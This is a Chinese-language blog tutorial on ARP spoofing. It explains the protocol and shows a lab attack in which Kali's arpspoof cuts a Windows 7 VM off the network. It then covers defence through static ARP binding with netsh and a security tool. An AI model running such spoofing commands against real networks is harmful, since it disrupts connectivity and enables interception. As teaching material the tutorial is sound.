首页 > 系统相关 >【Windows】ARP断网攻击及防御

【Windows】ARP断网攻击及防御

时间:2023-11-25 18:04:06浏览次数:46  
标签:ARP arp Windows PC1 地址 MAC 断网 IP地址

title: ARP断网攻击及防御
date: 2022-10-02 16:06:44
tags:
- windows
categories:
- windows

攻击

image

PC1的IP地址 10.9.136.222
PC2的IP地址 10.9.136.55
在局域网里通信 需要有IP地址和MAC地址
两台电脑PC1和PC2要想相互通信,PC1在连接PC2的时候,PC1会先查看自己的ARP缓存表(命令:arp -a ) ,看一下有没有 10.9.136.55对应的MAC地址,如果没有10.9.136.55对应的MAC地址,向交换机发送广播包,交换机会给每个接口都发送,当PC2收到消息后,会产生应答包,PC2把它的MAC地址发给交换机,目的地址会发送到PC1,(因为广播包是PC1发送的),PC1会把PC2的IP地址和MAC地址写入自己的ARP缓存表里

ARP欺骗原理

      在局域网中,主机通信前必须通过ARP协议把IP地址转换为MAC地址,ARP欺骗就是通过伪造IP地址与MAC地址的映射关系实现的一种欺骗攻击。因为局域网内的主机根据MAC地址进行通信,发送方检查其ARP缓存中是否已存储目标IP的MAC地址,否则它会广播发送ARP请求报文,只有目标IP的主机才会响应一个包含其MAC地址的ARP应答报文,发送方收到该应答后,立即更新自身的ARP缓存。攻击者可以发送虚假的ARP请求或应答报文,使得目标主机接收错误的IP和MAC绑定关系

实验准备

win7    网卡nat模式
kali    网卡nat模式   攻击方

1、win7:先ping一下,能否上网

ping www.baidu.com

image

2、win7:查看网关

ipconfig

image

3、win7:查看ARP缓存表,查看网关的MAC地址

arp -a

image

4、win7: 让它 一直ping下去

ping www.baidu.com -t

image

5、kali:开始攻击

arpspoof -i eth0 -t 192.168.241.130 -r 192.168.241.2
-i  选择网卡
-t  被攻击方的IP地址
-r  网关IP地址

image

image

在发动攻击的时候,网关的MAC地址被改成了攻击方kali的MAC地址,导致上不了网
image

防御

1、查看网关

ipconfig

image

2、查看网关对应的MAC地址为动态类型,

arp -a

image

3、查看本地网卡所对应的Idx值,以太网所对应的Idx值为2

netsh interface ipv4 show interfaces

#简写
netsh i i show in

image

4、静态绑定IP地址和MAC地址

# 2 代表网卡的Idx值 
# 以管理员身份运行该命令
# 绑定网关的IP地址和MAC地址
netsh -c "i i" add ne 2 10.9.136.1 50-6f-77-89-ad-92

5、再次查看arp缓存表

arp -a

image

6、取消arp静态绑定

#取消静态绑定
netsh -c "i i" delete ne 2

以上操作不能完全防御

在路由器出故障的情况下,换了一个新的路由器,那么物理地址就变了

再做了静态绑定就会导致无法上网,就需要解除与旧路由器的MAC地址绑定,绑定新的路由器MAC地址

可以使用软件360安全卫士

image

开启前三个功能
image

如果受到arp断网攻击,360安全卫士会提示,可以查看详细日志

image

360安全卫士有弹窗,可以安装火绒拦截弹窗

标签:ARP,arp,Windows,PC1,地址,MAC,断网,IP地址
From: https://www.cnblogs.com/saury/p/17855811.html

相关文章

  • 【Windows】DHCP部署与安全
    目录DHCP原理DHCP续约部署DHCP服务器删除DHCP服务wireshark抓取DHCP获取地址的四个步骤DHCP攻击与防御DHCP地址池耗尽攻击作用DynamicHostConfigureProtocol)自动分配IP地址相关概念地址池/作用域:(IP、子网掩码、网关、DNS、租期),DHCP协议端口是UDP67/68DHCP原理也成为DHCP......
  • 【Windows】rdp、ftp协议的密码爆破
    目录密码爆破工具hydra九头蛇爆破远程桌面爆破ftp服务器密码wireshark抓包远程桌面rdp协议3389文件传输FTP协议2021攻击方:Kali测试方:Win7两台都要在同一网段密码爆破工具hydra九头蛇hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常......
  • 【Windows】SAM文件破解
    目录win7win10nullwin7在对方不知情,不知道对方密码的情况下,破解密码以Win7为例步骤使用kali-live镜像(U盘版本),直接插入他人电脑就可直接运行模仿插入U盘进入BIOS,设置从镜像启动选择启动项将CD—ROM移动至第一个F10保存默认选中第一个,回车进来后,点击桌面Home,选......
  • 【Windows】DOS命令
    目录文件相关关机IP信息用户相关组相关文件共享端口和进程练习练习二练习三练习四nullcolor--help#查看帮助信息color0a#修改背景和字体颜色cls#清屏命令文件相关dir/a #查看隐藏文件/a:d#只查看目录......
  • windows中MySQL忘记密码
    前言:  一直都是连接公司项目数据库,许久未连接本地的数据库,密码忘记了 步骤:进入本机安装mysql的bin目录下暂停mysql服务 netstopmysql设置跳过密码授权登录 mysqld--console--skip-grant-tables--shared-memory 新开命令行窗口,输入mysql-uroot无密码登录修......
  • CSharp: vs 2022
    package.json {"name":"healthcheck","version":"0.0.0","scripts":{"ng":"ng","start":"echoStarting...&&ngserve","build&......
  • ARP和DNS欺骗实验
    一.实验目的1.了解ARP欺骗和DNS欺骗的原理2.掌握常见工具(ettercap)的使用 注意:本实验在虚拟机上面进行,不准用于破坏他人计算机环境或诱导他人下载木马,本实验仅做学习交流,禁止一切非法行为,否则后果自负!二.实验环境Kali、windows10 三.实验工具EtterCap扫描工具VMware......
  • GitKraken 9.10 (macOS, Windows) - 传奇的 Git 客户端
    GitKraken9.10(macOS,Windows)-传奇的Git客户端请访问原文链接:https://sysin.org/blog/gitkraken-9/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org全球数百万开发者和团队选择GitKraken客户端。它拥有超直观的GUI、强大的终端,并为Windows、Mac和Linux......
  • 开箱即用:Windows11已原生支持多种文件存档格式
    导读在今年5月份,微软方面曾宣布将在Windows11系统中原生增加对RAR、7-Zip等压缩文件格式的解压支持。在今年5月份,微软方面曾宣布将在Windows11系统中原生增加对RAR、7-Zip等压缩文件格式的解压支持。时至今日,该公司已通过本月的可选KB5031455预览累积更......
  • 5-Windows系统上安装java
      有一些生信软件是java语言写的,就需要安装java才能运行,下面展示java的安装。 1,下载(https://www.oracle.com/java/technologies/downloads/#java17) 官网下载java2,双击安装,这里的安装位置最好按照默认的来,不更改,在C盘。 安装3,配置环境变量,为了让任何目录......